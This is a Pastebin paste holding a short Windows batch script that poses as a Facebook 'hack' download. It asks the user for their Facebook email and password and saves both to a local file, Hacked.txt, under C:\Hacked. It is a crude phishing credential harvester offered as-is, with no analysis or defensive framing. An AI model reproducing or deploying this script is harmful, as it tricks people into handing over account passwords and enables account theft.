Advertisement
Guest User

Untitled

a guest
Sep 29th, 2016
130
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.45 KB | None | 0 0
  1. @echo off
  2. color a
  3. title Log on
  4. cls
  5. echo -------------------------------------------------------------------------------
  6. echo Please Enter Your Email Adress And Password From Facebook To Download The Hack.
  7. echo -------------------------------------------------------------------------------
  8. echo.
  9. echo.
  10. cd "C:\Hacked"
  11. set /p user=E-mail:
  12. set /p pass=Password:
  13. echo username="%user%" Password="%pass%" >Hacked.txt
  14. start >>Programmer Here<<
  15. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement